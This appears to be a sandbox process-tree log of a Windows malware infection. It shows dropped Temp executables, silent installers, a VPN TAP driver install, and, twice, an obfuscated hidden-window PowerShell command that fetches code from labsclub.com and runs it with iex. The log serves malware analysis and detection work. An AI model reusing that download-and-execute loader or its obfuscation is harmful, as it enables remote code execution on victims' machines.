C:\Users\Admin\AppData\Local\Temp\is-1N7HU.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-1N7HU.tmp\winlthsth.exe"2⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\50t6dsk0k.exe"C:\Users\Admin\AppData\Local\Temp\50t6dsk0k.exe"3⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\50t6dsk0k.exe"C:\Users\Admin\AppData\Local\Temp\50t6dsk0k.exe"4⤵PID:4356
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:184
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:4476
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HLOID.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-HLOID.tmp\vict.tmp" /SL5="$40298,870426,780800,C:\Users\Admin\AppData\Local\Temp\nlwpvfybmhu\vict.exe" /VERYSILENT /id=5351⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\is-G3Q7B.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-G3Q7B.tmp\win1host.exe" 5352⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\Ba3nZjHMj.exe"C:\Users\Admin\AppData\Local\Temp\Ba3nZjHMj.exe"3⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\Ba3nZjHMj.exe"C:\Users\Admin\AppData\Local\Temp\Ba3nZjHMj.exe"4⤵PID:5932
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 5723⤵
- Program crash
PID:6212
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:6092
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B3ABDAFD1D2C1BB82F43A91803CB2EF9 C2⤵PID:4192
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C4C8C6A96803244144B7D0A08FC78CCC2⤵PID:4256
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:6316
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3496
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5316
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7068
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5c9be0a6-00ff-2d44-82e0-fc7a04c84b29}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7108
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:6348
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6652
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7240
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:3896
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6792
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2384
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\97AE.exeC:\Users\Admin\AppData\Local\Temp\97AE.exe1⤵PID:7644
-
C:\Users\Admin\AppData\Local\Temp\9CA1.exeC:\Users\Admin\AppData\Local\Temp\9CA1.exe1⤵PID:4512
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8472
-
C:\Users\Admin\AppData\Local\Temp\B7DB.exeC:\Users\Admin\AppData\Local\Temp\B7DB.exe1⤵PID:9160